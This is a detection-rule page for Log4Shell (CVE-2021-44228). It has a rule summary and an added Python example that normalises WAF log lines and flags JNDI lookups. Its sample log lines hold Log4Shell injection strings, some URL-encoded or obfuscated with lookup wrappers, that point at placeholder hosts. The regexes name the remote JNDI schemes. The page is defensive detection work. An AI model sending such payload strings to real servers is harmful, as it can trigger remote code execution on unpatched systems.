Potential CVE-2021-44228 - Log4Shell

Anvilogic Forge

Summary
This rule detects potential exploitation attempts against CVE-2021-44228, widely known as Log4Shell, a vulnerability in the Apache Log4j Java logging library that can allow remote code execution. The detection logic focuses on identifying suspicious patterns related to the use of JNDI (Java Naming and Directory Interface) within web application firewall logs. Notably, the rule looks for the various ways the JNDI syntax may be expressed in logs from the /var/log directory, where compressed files may contain malicious payloads. It associates exploitation attempts with several threat actors, including well-known advanced persistent threat groups such as Andariel and Lazarus, reflecting widespread concern that this vulnerability is being targeted in real-world attacks. The logic uses both keyword searches and regular expressions to catch the exploit patterns. The detection covers entries containing specific character sequences that indicate an attempt to use JNDI to establish a remote connection, and hence an ongoing threat.
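As an added illustration of the keyword-plus-regex approach the summary describes (example code written for this page, not Anvilogic's rule logic, which the page does not show), the check below URL-decodes each WAF-style log line, strips the Log4j lookup wrappers commonly used to hide the literal `jndi` token, and then matches a JNDI lookup followed by a remote scheme. The log format, hostnames and the set of wrapper forms handled are assumptions.

```python
"""Indicator check for CVE-2021-44228 (Log4Shell) over WAF-style log lines."""
import re
from urllib.parse import unquote

# Constructed sample lines in an assumed WAF log format; not captured traffic.
SAMPLE_LOGS = [
    'GET /index.html UA="Mozilla/5.0" status=200',
    'GET /login UA="${jndi:ldap://lookup.example.invalid/a}" status=200',
    'GET /api?q=%24%7Bjndi%3Armi%3A%2F%2Flookup.example.invalid%2Fx%7D status=404',
    'GET /search UA="${${lower:j}ndi:dns://lookup.example.invalid}" status=200',
    'GET /docs X-Api-Version="${${::-j}${::-n}${::-d}${::-i}:ldap://lookup.example.invalid/b}" status=200',
    'GET /prices?total=${price} status=200',  # benign template syntax, must not match
]

# Log4j lookups that obfuscate the literal "jndi" token: ${lower:x}, ${upper:x}, ${::-x}
_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^}]*)\}|\$\{::-([^}]*)\}", re.IGNORECASE)
# After normalisation: a JNDI lookup followed by a scheme that reaches out to a remote host.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:", re.IGNORECASE)


def normalize(line: str, passes: int = 3) -> str:
    """URL-decode (bounded, in case of double encoding), then strip wrappers innermost first."""
    for _ in range(passes):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    prev = None
    while prev != line:  # repeat until no nested wrapper remains
        prev = line
        line = _WRAPPER.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), line)
    return line


def is_log4shell_attempt(line: str) -> bool:
    """True when the normalised line contains a JNDI lookup with a remote scheme."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (index, normalised_line) for every line that matches."""
    return [(i, normalize(l)) for i, l in enumerate(lines) if is_log4shell_attempt(l)]


if __name__ == "__main__":
    for idx, shown in scan(SAMPLE_LOGS):
        print(f"line {idx}: {shown}")
```

The keyword stage (`jndi` after normalisation) is what keeps the regex cheap on high-volume WAF data; the wrapper stripping is what keeps a plain `jndi:` keyword from being trivially bypassed.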
Categories
  • Web
  • Cloud
  • Application
  • Endpoint
Data Sources
  • Web Credential
  • Application Log
ATT&CK Techniques
  • T1190
Created: 2024-02-09